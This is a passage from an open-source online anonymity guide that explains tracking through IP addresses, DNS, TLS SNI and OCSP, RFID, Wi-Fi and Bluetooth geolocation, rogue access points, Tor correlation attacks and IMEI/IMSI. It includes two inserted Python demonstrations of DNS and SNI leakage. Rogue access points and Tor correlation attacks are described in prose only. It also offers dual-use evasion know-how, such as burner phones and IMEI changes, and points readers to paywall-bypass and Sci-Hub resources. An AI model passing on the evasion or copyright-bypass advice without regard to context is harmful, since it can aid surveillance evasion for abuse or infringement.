(Or “How I learned to start worrying and love privacy anonymity”)
Version 1.1.6, April 2023 by Anonymous Planet
This is a message to the people of Ukraine. We strongly recommend that you use Briar for communicating. You can find it here: https://briarproject.org/ . With this application you can communicate even when there is no Internet. The manual is here: https://briarproject.org/manual/uk/, quick start: https://briarproject.org/quick-start/uk/
This is a message for the people of Ukraine. We strongly recommend that you use Briar for communicating. You can find it here: https://briarproject.org/ With this application, you can communicate even when there is no internet. The manual is here: https://briarproject.org/manual/, quick-start guide here: https://briarproject.org/quick-start/
This guide is a work in progress. It will probably never be “finished”.
No affiliation with the Anonymous [Wikiless] [Archive.org] collective/movement.
There might be some wrong or outdated information in this guide because no one is perfect.
Your experience may vary. Remember to check regularly for an updated version of this guide.
This guide is a non-profit open-source initiative, licensed under Creative Commons Attribution-NonCommercial 4.0 International (cc-by-nc-4.0 [Archive.org]).
For mirrors see Appendix A6: Mirrors
For help in comparing versions see Appendix A7: Comparing versions
Feel free to submit issues (please do report anything wrong) using GitHub Issues at: https://github.com/Anon-Planet/thgtoa/issues
Feel free to come to discuss ideas at:
Rules for our chatrooms: https://anonymousplanet.org/chatrooms-rules.html
Matrix/Element Room: #anonymity:matrix.org
https://matrix.to/#/#anonymity:matrix.org
Matrix Space regrouping several rooms with similar interests: #privacy-security-anonymity:matrix.org
https://matrix.to/#/#privacy-security-anonymity:matrix.org.
Follow us on:
Twitter at https://twitter.com/AnonyPla
Mastodon at https://mastodon.social/@anonymousplanet
To contact me, see the updated information on the website or send an e-mail to contact@anonymousplanet.org
Please consider donating if you enjoy the project and want to support the hosting fees or support the funding of initiatives like the hosting of Tor Exit Nodes.
There are several ways you could read this guide:
You want to understand the current state of online privacy and anonymity without necessarily getting too technical about it: Just read the Introduction, Requirements, Understanding some basics of how some information can lead back to you and how to mitigate those and A final editorial note sections.
You want to do the above but also learn how to remove some online information about you: Just read the above and add the Removing some traces of your identities on search engines and various platforms.
You want to do the above and create online anonymous identities online safely and securely: Read the whole guide.
Precautions while reading this guide and accessing the various links:
Documents/Files have a [Archive.org] link next to them for accessing content through Archive.org for increased privacy and in case the content goes missing. Some links are not yet archived or outdated on archive.org in which case we encourage you to ask for a new save if possible.
YouTube Videos have a [Invidious] link next to them for accessing content through an Invidious Instance (in this case yewtu.be hosted in the Netherlands) for increased privacy. It is recommended to use these links when possible. See https://github.com/iv-org/invidious [Archive.org] for more information.
Twitter links have a [Nitter] link next to them for accessing content through a Nitter Instance (in this case nitter.net) for increased privacy. It is recommended to use these links when possible. See https://github.com/zedeus/nitter [Archive.org] for more information.
Wikipedia links have a [Wikiless] link next to them for accessing content through a Wikiless Instance (in this case Wikiless.org) for increased privacy. It is recommended to use these links when possible. See https://codeberg.org/orenom/wikiless [Archive.org] for more information.
Medium links have [Scribe.rip] link next to them for accessing content through a Scribe.rip Instance for increased privacy. Again, it is recommended to use these links when possible. See https://scribe.rip/ [Archive.org] for more information.
If you are reading this in PDF or ODT format, you will notice plenty of ``` in place of double quotes (""). These ``` are there to ease conversion into Markdown/HTML format for online viewing of code blocks on the website.
If you do not want the hassle and use one of the browsers below, you could also just install the following extension on your browser: https://libredirect.github.io/ [Archive.org]:
Firefox: https://addons.mozilla.org/en-US/firefox/addon/libredirect/
Chromium-based browsers (Chrome, Brave, Edge): https://github.com/libredirect/libredirect/blob/master/chromium.md
If you are having trouble accessing any of the many academic articles referenced in this guide due to paywalls, feel free to use Sci-Hub (https://en.wikipedia.org/wiki/Sci-Hub [Wikiless] [Archive.org]) or LibGen (https://en.wikipedia.org/wiki/Library_Genesis [Wikiless] [Archive.org]) for finding and reading them. Because Science should be free. All of it. If you are faced with a paywall accessing some resources, consider using https://12ft.io/.
Finally note that this guide does mention and even recommends various commercial services (such as VPNs, CDNs, e-mail providers, hosting providers…) but is not endorsed or sponsored by any of them in any way. There are no referral links and no commercial ties with any of these providers. This project is 100% non-profit and only relying on donations.
Understanding of the English language (in this case American English).
Be a permanent resident in Germany where the courts have upheld the legality of not using real names on online platforms (§13 VI of the German Telemedia Act of 2007)1,2. Alternatively, be a resident of any other country where you can confirm and verify the legality of this guide yourself.
This guide will assume you already have access to some (Windows/Linux/macOS) laptop computer - ideally not a work/shared device - and a basic understanding of how computers work.
Have patience, as this process could take several weeks to complete if you want to go through all the content.
Have some free time on your hands to dedicate to this process (depending on which route you pick).
Be prepared to read a lot of references (do read them), guides (do not skip them), and tutorials thoroughly (do not skip them either).
Don’t be evil (for real this time)3.
Understand that there is no common path that will be both quick and easy.
This guide is not intended for:
Creating bot accounts of any kind.
Creating impersonation accounts of existing people (such as identity theft).
Helping malicious actors conduct unethical, criminal, or illicit activities (such as trolling, stalking, disinformation, misinformation, harassment, bullying, or fraud).
Use by minors.
TLDR for the whole guide: “A strange game. The only winning move is not to play” 4.
Making a social media account with a pseudonym or artist/brand name is easy. And it is enough in most use cases to protect your identity as the next George Orwell. There are plenty of people using pseudonyms all over Facebook/Instagram/Twitter/LinkedIn/TikTok/Snapchat/Reddit/… But the vast majority of those are anything but anonymous and can easily be traced to their real identity by your local police officers, random people within the OSINT5 (Open-Source Intelligence) community, and trolls6 on 4chan7.
This is a good thing as most criminals/trolls are not tech-savvy and will usually be identified with ease. But this is also a terrible thing as most political dissidents, human rights activists and whistleblowers can also be tracked rather easily.
This guide aims to provide an introduction to various de-anonymization techniques, tracking techniques, ID verification techniques, and optional guidance to creating and maintaining reasonably and truly online anonymous identities including social media accounts safely. This includes mainstream platforms and not only the privacy-friendly ones.
It is important to understand that the purpose of this guide is anonymity and not just privacy but much of the guidance you will find here will also help you improve your privacy and security even if you are not interested in anonymity. There is an important overlap in techniques and tools used for privacy, security, and anonymity but they differ at some point:
Privacy is about people knowing who you are but not knowing what you are doing.
Anonymity is about people knowing what you are doing but not knowing who you are 8.
(Illustration from9)
Will this guide help you protect yourself from the NSA, the FSB, Mark Zuckerberg, or the Mossad if they are out to find you? Probably not … Mossad will be doing “Mossad things” 10 and will probably find you no matter how hard you try to hide11.
You must consider your threat model12 before going further.
(Illustration by Randall Munroe, xkcd.com, licensed under CC BY-NC 2.5)
Will this guide help you protect your privacy from OSINT researchers like Bellingcat13, Doxing14 trolls on 4chan15, and others that have no access to the NSA toolbox? More likely. Though we would not be so sure about 4chan.
Here is a basic simplified threat model for this guide:
(Note that the “magical amulets/submarine/fake your own death” jokes are quoted from the excellent article “This World of Ours” by James Mickens, 2014.16)
Disclaimer: Jokes aside (magical amulet…). Of course, there are also advanced ways to mitigate attacks against such advanced and skilled adversaries but those are just out of the scope of this guide. It is crucially important that you understand the limits of the threat model of this guide. And therefore, this guide will not double in size to help with those advanced mitigations as this is just too complex and will require an exceedingly high knowledge and skill level that is not expected from the targeted audience of this guide.
The EFF provides a few security scenarios of what you should consider depending on your activity. While some of those tips might not be within the scope of this guide (more about Privacy than Anonymity), they are still worth reading as examples. See https://ssd.eff.org/en/module-categories/security-scenarios [Archive.org].
If you want to go deeper into threat modeling, see Appendix B3: Threat modeling resources.
You might think this guide has no legitimate use but there are many17,18,19,20,21,22,23 such as:
Evading Online Censorship24
Evading Online Oppression
Evading Online Stalking, Doxxing, and Harassment
Evading Online Unlawful Government Surveillance
Anonymous Online Whistle Blowing
Anonymous Online Activism
Anonymous Online Journalism
Anonymous Online Legal Practice
Anonymous Online Academic Activities (For instance accessing scientific research where such resources are blocked). See note below.
…
This guide is written with hope for those good-intended individuals who might not be knowledgeable enough to consider the big picture of online anonymity and privacy.
Lastly, use it at your own risk. Anything in here is not legal advice and you should verify compliance with your local law before use (IANAL25). “Trust but verify”26 all the information yourself (or even better, “Never Trust, always verify”27). We strongly encourage you to inform yourself and do not hesitate to check any information in this guide with outside sources in case of doubt. Please do report any mistake you spot to us as we welcome criticism. Even harsh but sound criticism is welcome and will result in having the necessary corrections made as quickly as possible.
There are many ways you can be tracked besides browser cookies and ads, your e-mail, and your phone number. And if you think only the Mossad or the NSA/FSB can find you, you would be wrong.
First, you could also consider these more general resources on privacy and security to learn more basics:
The New Oil*: https://thenewoil.org/ [Archive.org]
Techlore videos*: https://www.youtube.com/c/Techlore [Invidious]
Privacy Guides: https://privacyguides.org/ [Archive.org]
Privacy Tools*: https://privacytools.io [Archive.org]
Note that these websites could contain affiliate/sponsored content and/or merchandising. This guide does not endorse and is not sponsored by any commercial entity in any way.
If you skipped those, you should really still consider viewing this YouTube playlist from the Techlore Go Incognito project (https://github.com/techlore-official/go-incognito [Archive.org]) as an introduction before going further: https://www.youtube.com/playlist?list=PL3KeV6Ui_4CayDGHw64OFXEPHgXLkrtJO [Invidious]. This guide will cover many of the topics in the videos of this playlist with more details and references as well as some added topics not covered within that series. This will just take you 2 or 3 hours to watch it all.
Now, here is a non-exhaustive list of some of the many ways you could be tracked and de-anonymized:
Disclaimer: this whole paragraph is about your public-facing Internet IP and not your local network IP.
Your IP address28 is the most known and obvious way you can be tracked. That IP is the IP you are using at the source. This is where you connect to the internet. That IP is usually provided by your ISP (Internet Service Provider) (xDSL, Mobile, Cable, Fiber, Cafe, Bar, Friend, Neighbor). Most countries have data retention regulations29 that mandate keeping logs of who is using what IP at a certain time/date for up to several years or indefinitely. Your ISP can tell a third party that you were using a specific IP at a specific date and time, years after the fact. If that IP (the original one) leaks at any point for any reason, it can be used to track you down directly. In many countries, you will not be able to have internet access without providing some form of identification to the provider (address, ID, real name, e-mail …).
Needless to say, most platforms (such as social networks) will also keep (sometimes indefinitely) the IP addresses you used to sign up and sign into their services.
Here are some online resources you can use to find some information about your current public IP right now:
Find your IP:
https://www.dnsleaktest.com/ (Bonus, check your IP for DNS leaks)
Find your IP location or the location of any IP:
Find if an IP is “suspicious” (in blocklists) or has downloaded “things” on some public resources:
https://iknowwhatyoudownload.com (Take this with a grain of salt, it might not show anything interesting and has limited data sources. This is more for fun than anything serious.)
Registration information of an IP (most likely your ISP or the ISP of your connection who most likely know who is using that IP at any time):
Check for open-services or open devices on an IP (especially if there are leaky Smart Devices on it):
Various tools to check your IP such as block-lists checkers and more:
Would you like to know if you are connected through Tor?
For those reasons, you will need to obfuscate and hide that origin IP (the one tied to your identification) or hide it through a combination of various means:
Using a public Wi-Fi service (free).
Using the Tor Anonymity Network30 (free).
Using VPN31 services anonymously (anonymously paid with cash or Monero).
Do note that, unfortunately, these solutions are not perfect, and you will experience performance issues32.
All those will be explained later in this guide.
DNS stands for “Domain Name System”33 and is a service used by your browser (and other apps) to find the IP addresses of a service. It is a huge “contact list” (phone book for older people) that works like asking it a name and it returns the number to call. Except it returns an IP instead.
Every time your browser wants to access a certain service such as Google through www.google.com, your browser (Chrome or Firefox) will query a DNS service to find the IP addresses of the Google web servers.
Here is a video explaining DNS visually if you are already lost: https://www.youtube.com/watch?v=vrxwXXytEuI [Invidious]
Usually, the DNS service is provided by your ISP and automatically configured by the network you are connecting to. This DNS service could also be subject to data retention regulations or will just keep logs for other reasons (data collection for advertising purposes for instance). Therefore, this ISP will be capable of telling everything you did online just by looking at those logs which can, in turn, be provided to an adversary. Conveniently this is also the easiest way for many adversaries to apply censoring or parental control by using DNS blocking34. The provided DNS servers will give you a different address (than their real one) for some websites (like redirecting thepiratebay.org to some government website). Such blocking is widely applied worldwide for certain sites35.
Using a private DNS service or your own DNS service would mitigate these issues, but the other problem is that most of those DNS requests are by default still sent in clear text (unencrypted) over the network. Even if you browse PornHub in an incognito Window, using HTTPS and using a private DNS service, chances are exceedingly high that your browser will send a clear text unencrypted DNS request to some DNS servers asking basically “So what’s the IP address of www.pornhub.com?”.
Because it is not encrypted, your ISP and/or any other adversary could still intercept your request (using a Man-in-the-middle attack36), learn and possibly log what your IP was looking for. The same ISP can also tamper with the DNS responses even if you are using a private DNS, rendering the use of a private DNS service useless.
As a bonus, many devices and apps will use hardcoded DNS servers bypassing any system setting you could set. This is for example the case with most (70%) Smart TVs and a large part (46%) of Game Consoles37. For these devices, you will have to force them38 to stop using their hardcoded DNS service which could make them stop working properly.
A solution to this is to use encrypted DNS using DoH (DNS over HTTPS39), DoT (DNS over TLS40) with a private DNS server (this can be self-hosted locally with a solution like pi-hole41, remotely hosted with a solution like nextdns.io or using the solutions provided by your VPN provider or the Tor network). This should prevent your ISP or some go-between from snooping on your requests … except it might not.
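To make the difference between clear-text DNS and DoH concrete, here is an added example (not code from the guide): it builds a plain RFC 1035 query, shows that an eavesdropper on UDP/53 can read the queried name straight out of the packet, and then wraps the identical wire-format query in the RFC 8484 DoH GET form that travels inside TLS. The resolver name dns.example.net and the queried hostnames are constructed placeholders.

```python
import base64
import struct

# Added example, not from the guide: what an on-path observer sees in a
# classic UDP/53 DNS query, and how the same bytes are carried over DoH.


def encode_qname(name: str) -> bytes:
    """Encode a hostname as DNS labels, e.g. b'\\x03www\\x07example\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("a DNS label must be 1..63 octets")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Minimal RFC 1035 query: 12-byte header plus one question (qtype 1 = A)."""
    # flags 0x0100 = standard query with recursion desired; qdcount = 1
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack("!HH", qtype, 1)


def observed_name(udp_payload: bytes) -> str:
    """What an eavesdropper reads from an unencrypted query: the QNAME in clear."""
    pos, labels = 12, []  # skip the fixed header
    while True:
        length = udp_payload[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers never appear in a question we built
            raise ValueError("unexpected compression pointer in question")
        labels.append(udp_payload[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels)


def doh_get_url(resolver: str, query: bytes) -> str:
    """RFC 8484 GET form: the wire-format query, base64url without padding,
    in the 'dns' query parameter. On the wire an observer now only sees a TLS
    session to the resolver, not the name being asked for."""
    b64 = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"https://{resolver}/dns-query?dns={b64}"


def doh_decode(url: str) -> bytes:
    """Inverse of doh_get_url (the resolver's side): restore padding and decode."""
    b64 = url.split("dns=", 1)[1]
    return base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4))


if __name__ == "__main__":
    q = build_query("www.example.com")
    print("on UDP/53 the observer reads:", observed_name(q))
    # RFC 8484 recommends txid 0 for GET so responses cache well; kept here for illustration.
    print("same query as a DoH GET:", doh_get_url("dns.example.net", q))
```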
Small in-between Disclaimer: This guide does not necessarily endorse or recommend Cloudflare services even if it is mentioned several times in this section for technical understanding.
Unfortunately, the TLS protocol used in most HTTPS connections in most Browsers (Chrome/Brave among them) will leak the Domain Name again through SNI42 handshakes (this can be checked here at Cloudflare: https://www.cloudflare.com/ssl/encrypted-sni/ [Archive.org]). As of the writing of this guide, only Firefox-based browsers support ECH (Encrypted Client Hello43, previously known as eSNI44) on some websites, which will encrypt everything end to end (in addition to using a secure private DNS over TLS/HTTPS) and will allow you to hide your DNS requests from a third party45. And this option is not enabled by default either, so you will have to enable it yourself.
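As an added illustration of the SNI leak (not code from the guide), the following builds a minimal TLS ClientHello carrying a server_name extension and then parses it the way a passive on-path observer would: the handshake is sent before any key exchange, so the hostname is readable in clear. ECH is precisely the mechanism that moves this field into an encrypted inner ClientHello. The hostname www.example.com and the zeroed random are constructed values.

```python
import struct
from typing import Optional

# Added example, not from the guide: the SNI host_name in a ClientHello is
# plaintext, so anyone between you and the server can read it.

SNI_EXT = 0x0000  # extension type server_name (RFC 6066)


def build_client_hello(hostname: str) -> bytes:
    """Minimal TLS record holding a ClientHello with a single SNI extension."""
    host = hostname.encode("ascii")
    # ServerNameList with one entry: name_type 0 = host_name
    sni_entry = b"\x00" + struct.pack("!H", len(host)) + host
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    extension = struct.pack("!HH", SNI_EXT, len(sni_list)) + sni_list
    extensions = struct.pack("!H", len(extension)) + extension

    body = (
        b"\x03\x03"                # client_version TLS 1.2
        + bytes(32)                # random (constructed, all zero)
        + b"\x00"                  # session_id length 0
        + b"\x00\x02\x13\x01"      # one cipher suite: TLS_AES_128_GCM_SHA256
        + b"\x01\x00"              # one compression method: null
        + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # type 1 = ClientHello
    # record type 22 = handshake, legacy record version 3.1
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def observed_sni(record: bytes) -> Optional[str]:
    """Walk the plaintext ClientHello and return the SNI host_name, if present."""
    if len(record) < 6 or record[0] != 0x16 or record[5] != 0x01:
        return None                # not a handshake record / not a ClientHello
    pos = 5 + 4                    # record header (5) + handshake header (4)
    pos += 2 + 32                  # client_version + random
    pos += 1 + record[pos]         # session_id
    cs_len = struct.unpack_from("!H", record, pos)[0]
    pos += 2 + cs_len              # cipher_suites
    pos += 1 + record[pos]         # compression_methods
    if pos + 2 > len(record):
        return None                # no extensions block at all
    ext_total = struct.unpack_from("!H", record, pos)[0]
    pos += 2
    end = pos + ext_total
    while pos + 4 <= end:
        ext_type, ext_len = struct.unpack_from("!HH", record, pos)
        pos += 4
        if ext_type == SNI_EXT:
            # skip the 2-byte list length, then name_type (1) and name length (2)
            name_type = record[pos + 2]
            name_len = struct.unpack_from("!H", record, pos + 3)[0]
            if name_type == 0:
                return record[pos + 5:pos + 5 + name_len].decode("ascii")
        pos += ext_len
    return None


if __name__ == "__main__":
    hello = build_client_hello("www.example.com")
    print("observer reads SNI:", observed_sni(hello))
```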
In addition to limited browser support, only web Services and CDNs46 behind Cloudflare CDN support ECH/eSNI at this stage47. This means that ECH and eSNI are not supported (as of the writing of this guide) by most mainstream platforms such as:
Amazon (including AWS, Twitch…)
Microsoft (including Azure, OneDrive, Outlook, Office 365…)
Google (including Gmail, Google Cloud…)
Apple (including iCloud, iMessage…)
YouTube
GitHub
…
Some countries like Russia48 and China49 might (unverified despite the articles) block ECH/eSNI handshakes at the network level to allow snooping and prevent bypassing censorship. Meaning you will not be able to establish an HTTPS connection with a service if you do not allow them to see what it was.
The issues do not end here. Part of the HTTPS TLS validation is called OCSP50, and this protocol, used by Firefox-based browsers, will leak metadata in the form of the serial number of the certificate of the website you are visiting. An adversary can then easily find which website you are visiting by matching the certificate number51. This issue can be mitigated by using OCSP stapling52. Unfortunately, this is enabled but not enforced by default in Firefox/Tor Browser, and the website you are visiting must also support it, which not all do. Chromium-based browsers on the other hand use a different system called CRLSets53,54 which is arguably better.
Here is a list of how various browsers behave with OCSP: https://www.ssl.com/blogs/how-do-browsers-handle-revoked-ssl-tls-certificates/ [Archive.org]
Here is an illustration of the issue you could encounter on Firefox-based browsers:
Finally, even if you use a custom encrypted DNS server (DoH or DoT) with ECH/eSNI support and OCSP stapling, it might still not be enough as traffic analysis studies55 have shown it is still possible to reliably fingerprint and block unwanted requests. Only DNS over Tor was able to show efficient DNS Privacy in recent studies but even that can still be defeated by other means (see Your Anonymized Tor/VPN traffic).
One could also decide to use a Tor Hidden DNS Service or ODoH (Oblivious DNS over HTTPS56) to further increase privacy/anonymity but unfortunately, as far as we know, these methods are only provided by Cloudflare as of this writing (https://blog.cloudflare.com/welcome-hidden-resolver/ [Archive.org], https://blog.cloudflare.com/oblivious-dns/ [Archive.org]). These are workable and reasonably secure technical options but there is also a moral choice if you want to use Cloudflare or not (despite the risk posed by some researchers57).
Note that Oblivious DNS addresses an adversary that eavesdrops on one of the connections listed here but not all. It does not address a global passive adversary (GPA) who can eavesdrop on many or all of these connections:
traffic between the client resolver and the recursive resolver
the recursive resolver and the ODNS resolver
the ODNS resolver and an authoritative server
Lastly, there is also this new possibility called DoHoT which stands for DNS over HTTPS over Tor which could also further increase your privacy/anonymity and which you could consider if you are more skilled with Linux. See https://github.com/alecmuffett/dohot [Archive.org]. This guide will not help you with this one at this stage, but it might be coming soon.
Here is an illustration showing the current state of DNS and HTTPS privacy based on our current knowledge.
As for your normal daily use (non-sensitive), remember that only Firefox-based browsers support ECH (formerly eSNI) so far and that it is only useful with websites hosted behind Cloudflare CDN at this stage. If you prefer a Chrome-based version (which is understandable for some due to some better-integrated features like on-the-fly Translation), then we would recommend the use of Brave instead which supports all Chrome extensions and offers much better privacy than Chrome.
But the story does not stop there. Even after all this, even if you encrypt your DNS and use all possible mitigations, simple IP requests to any server will probably still allow an adversary to detect which site you are visiting. This is simply because the majority of websites have unique IPs tied to them, as explained here: https://blog.apnic.net/2019/08/23/what-can-you-learn-from-an-ip-address/ [Archive.org]. This means that an adversary can create a dataset of known websites including their IPs and then match this dataset against the IP you ask for. In most cases, this will result in a correct guess of the website you are visiting. This means that despite OCSP stapling, despite ECH/eSNI, despite using Encrypted DNS … an adversary can still guess the website you are visiting anyway.
Therefore, to mitigate all these issues (as much as possible and as best as we can), this guide will later recommend two solutions: using Tor, and a virtualized (see Appendix W: Virtualization) multi-layered VPN over Tor solution (DNS over VPN over Tor or DNS over Tor). Other options will also be explained (Tor over VPN, VPN only, No Tor/VPN) but are less recommended.
RFID stands for Radio-frequency identification58. It is the technology used for instance for contactless payments and various identification systems. Of course, your smartphone is among those devices and has RFID contactless payment capabilities through NFC59. As with everything else, such capabilities can be used for tracking by various actors.
But unfortunately, this is not limited to your smartphone, and you also probably carry some RFID-enabled devices with you all the time such as:
Your contactless-enabled credit/debit cards
Your store loyalty cards
Your transportation payment cards
Your work-related access cards
Your car keys
Your national ID or driver license
Your passport
The price/anti-theft tags on object/clothing
…
While none of these can be used to de-anonymize you by a remote online adversary, they can be used to narrow down a search if your approximate location at a certain time is known. For instance, you cannot rule out that some stores will effectively scan (and log) all RFID chips passing through the door. They might be looking for their loyalty cards but are also logging others along the way. Such RFID tags could be traced to your identity and allow for de-anonymization.
More information over at Wikipedia: https://en.wikipedia.org/wiki/Radio-frequency_identification#Security_concerns [Wikiless] [Archive.org] and https://en.wikipedia.org/wiki/Radio-frequency_identification#Privacy [Wikiless] [Archive.org]
The only way to mitigate this problem is to have no RFID tags on you or to shield them using a type of Faraday cage. You could also use specialized wallets/pouches that specifically block RFID communications. Many of those are now made by well-known brands such as Samsonite60. You should just not carry such RFID devices while conducting sensitive activities.
See Appendix N: Warning about smartphones and smart devices
Geolocation is not only done by using mobile antenna triangulation. It is also done using the Wi-Fi and Bluetooth devices around you. Operating system makers like Google (Android61) and Apple (iOS62) maintain a convenient database of most Wi-Fi access points, Bluetooth devices, and their location. When your Android smartphone or iPhone is on (and not in Airplane mode), it will actively scan the Wi-Fi access points and Bluetooth devices around you (unless you specifically disable this feature in the settings) and will be able to geolocate you with more precision than when using a GPS.
This active and continuous probing can then be sent back to Google/Apple/Microsoft as part of their Telemetry. The issue is that this probing is unique and can be used to uniquely identify a user and track that user. Shops, for example, can use this technique to fingerprint customers including when they return, where they go in the shop and how long they stay at a particular place. There are several papers63,64 and articles65 describing this issue in depth.
This allows them to provide accurate locations even when GPS is off, but it also allows them to keep a convenient record of all Wi-Fi and Bluetooth devices all over the world, which can then be accessed by them or third parties for tracking.
Note: If you have an Android smartphone, Google probably knows where it is no matter what you do. You cannot really trust the settings. The whole operating system is built by a company that wants your data. Remember that if it is free then you are the product.
But that is not all those Wi-Fi access points can do. Recently developed technologies could even allow someone to track your movements accurately based only on radio interference. What this means is that it is possible to track your movement inside a room/building based on the radio signals passing through. This might seem like a tinfoil hat conspiracy theory claim but here are the references66 with demonstrations showing this tech in action: http://rfpose.csail.mit.edu/ [Archive.org] and the video here: https://www.youtube.com/watch?v=HgDdaMy8KNE [Invidious]
Other researchers have found a way to count the people in a defined space using only Wi-Fi, see https://www.news.ucsb.edu/2021/020392/dont-fidget-wifi-will-count-you [Archive.org]
You could therefore imagine many use cases for such technologies like recording who enters specific buildings/offices (hotels, hospitals, or embassies for instance) and then discover who meets who and thereby tracking them from outside. Even if they have no smartphone on them.
Again, such an issue could only be mitigated by being in a room/building that would act as a Faraday cage.
Here is another video of the same kind of tech in action: https://www.youtube.com/watch?v=FDZ39h-kCS8 [Invidious]
See Appendix N: Warning about smartphones and smart devices
There is not much you can do about these, besides being non-identifiable in the first place.
These have been used at least since 2008 using an attack called “Jasager”67 and can be done by anyone using self-built tools or using commercially available devices such as Wi-Fi Pineapple68.
Here are some videos explaining more about the topic:
YouTube, Hak5, Wi-Fi Pineapple Mark VII https://www.youtube.com/watch?v=7v3JR4Wlw4Q [Invidious]
These devices can fit in a small bag and can take over the Wi-Fi environment of any place within their range, for instance a Bar/Restaurant/Café/Hotel Lobby. These devices can force Wi-Fi clients to disconnect from their current Wi-Fi (using de-authentication and disassociation attacks69) while spoofing the normal Wi-Fi networks at the same location. They will continue to perform this attack until your computer or you decide to try to connect to the rogue AP.
These devices can then mimic a captive portal70 with the exact same layout as the Wi-Fi you are trying to access (for instance an Airport Wi-Fi registration portal). Or they could just give you unrestricted internet access that they will themselves get from the same place.
Once you are connected through the Rogue AP, this AP will be able to execute various man-in-the-middle attacks to perform analysis on your traffic. These could be malicious redirections or simple traffic sniffing. These can then easily identify any client that would for instance try to connect to a VPN server or the Tor Network.
This can be useful when you know someone you want to de-anonymize is in a crowded place, but you do not know who. This would allow such an adversary to possibly fingerprint any website you visit despite the use of HTTPS, DoT, DoH, ODoH, VPN, or Tor using traffic analysis, as pointed out above in the DNS section.
These can also be used to carefully craft and serve you advanced phishing webpages that would harvest your credentials or try to make you install a malicious certificate allowing them to see your encrypted traffic.
How to mitigate those? If you do connect to a public Wi-Fi access point, use Tor, or use a VPN and then Tor (Tor over VPN), or even VPN over Tor, to obfuscate your traffic from the rogue AP while still using it.
Tor and VPNs are not silver bullets. Many advanced techniques have been developed and studied to de-anonymize encrypted Tor traffic over the years71. Most of those techniques are Correlation attacks that will correlate your network traffic in one way or another to logs or datasets. Here are some examples:
There are ways to mitigate these such as:
Do not use Tor/VPNs to access services that are on the same network (ISP) as the destination service. For example, do not connect to Tor from your University Network to access a University Service anonymously. Instead, use a different source point (such as a public Wi-Fi) that cannot be correlated easily by an adversary.
Do not use Tor/VPN from an obviously heavily monitored network (such as a corporate/governmental network) but instead try to find an unmonitored network such as a public Wi-Fi or a residential Wi-Fi.
Consider the use of multiple layers (such as what this guide will recommend later: VPN over Tor), so that the destination only sees a VPN IP rather than a Tor exit, while your ISP only sees a Tor connection; an adversary watching either end alone cannot tell that the two belong to the same person.
Be aware again that this might not be enough against a motivated global adversary77 with wide access to global mass surveillance. Such an adversary might have access to logs no matter where you are and could use those to de-anonymize you. Such adversaries also commonly obtain the needed vantage points by running many Tor relays themselves, which is known as a Sybil attack78. These adversaries are out of the scope of this guide.
Also be aware that all the other methods described in this guide, such as behavioral analysis, can be used to deanonymize Tor users indirectly (see Your Digital Fingerprint, Footprint, and Online Behavior further on).
I also strongly recommend reading this very good, complete, and thorough (and more detailed) guide on most known Attack Vectors on Tor: https://github.com/Attacks-on-Tor/Attacks-on-Tor [Archive.org] as well as this recent research publication https://www.researchgate.net/publication/323627387_Shedding_Light_on_the_Dark_Corners_of_the_Internet_A_Survey_of_Tor_Research [Archive.org]
As well as this great series of blog posts: https://www.hackerfactor.com/blog/index.php?/archives/906-Tor-0day-The-Management-Vulnerability.html [Archive.org]
In 2014, one such attack ran against the Tor network for months; more information here: https://arstechnica.com/information-technology/2014/07/active-attack-on-tor-network-tried-to-decloak-users-for-five-months/ [Archive.org]
Lastly, do remember that using Tor can already be considered suspicious activity79, and its use could be considered malicious by some80.
This guide will later propose some mitigations to such attacks by changing your origin from the start (using public Wi-Fi, for instance). Remember that such attacks are usually carried out by highly skilled, highly resourceful, and motivated adversaries and are out of scope for this guide. It is also recommended that you learn about practical correlation attacks as performed by intelligence agencies: https://officercia.mirror.xyz/WeAilwJ9V4GIVUkYa7WwBwV2II9dYwpdPTp3fNsPFjo [Archive.org]
Disclaimer: it should also be noted that Tor is not designed to protect against a global adversary. For more information see https://svn-archive.torproject.org/svn/projects/design-paper/tor-design.pdf [Archive.org] and specifically, “Part 3. Design goals and assumptions.”.
You have seen this in action/spy/Sci-Fi movies and shows, the protagonists always remove the battery of their phones to make sure it cannot be used. Most people would think that’s overkill. Well, unfortunately, no, this is now becoming true at least for some devices:
Such devices continue to broadcast identifying information to nearby devices over Bluetooth Low Energy85 even when powered off or offline. The vendor does not reach the device directly (it is not on the internet) but locates it through other nearby devices86: the offline device broadcasts over short-range, peer-to-peer Bluetooth, and any nearby online device relays the sighting.
They could now find such devices and keep the location in some database that could then be used by third parties or themselves for various purposes (including analytics, advertising, or evidence/intelligence gathering).
See Appendix N: Warning about smartphones and smart devices
TLDR: Do not take such devices with you when conducting sensitive activities.
The IMEI (International Mobile Equipment Identity87) and the IMSI (International Mobile Subscriber Identity88) are unique numbers created by cell phone manufacturers and cell phone operators.
The IMEI is tied directly to the phone you are using. This number is known and tracked by the cell phone operators and known by the manufacturers. Every time your phone connects to the mobile network, it registers the IMEI on the network along with the IMSI (if a SIM card is inserted, but even that is not needed). It is also used by many applications (banking apps abusing the phone permission on Android, for instance89) and smartphone operating systems (Android/iOS) to identify the device90. It is possible but difficult (and its legality varies by jurisdiction91) to change the IMEI on a phone, but it is probably easier and cheaper to just find and buy some old (working) burner phone for a few euros (this guide is for Germany, remember) at a flea market or some random small shop.
The IMSI is tied directly to the mobile subscription or pre-paid plan you are using and is tied to your phone number by your mobile provider. The IMSI is hardcoded directly on the SIM card and cannot be changed. Remember that every time your phone connects to the mobile network, it will also register the IMSI on the network along with the IMEI. Like the IMEI, the IMSI is also being used by some applications and smartphone Operating systems for identification and is being tracked. Some countries in the EU for instance maintain a database of IMEI/IMSI associations for easy querying by Law Enforcement.
Today, giving away your (real) phone number is the same or better than giving away your Social Security number/Passport ID/National ID.
The IMEI and IMSI can be traced back to you in at least six ways:
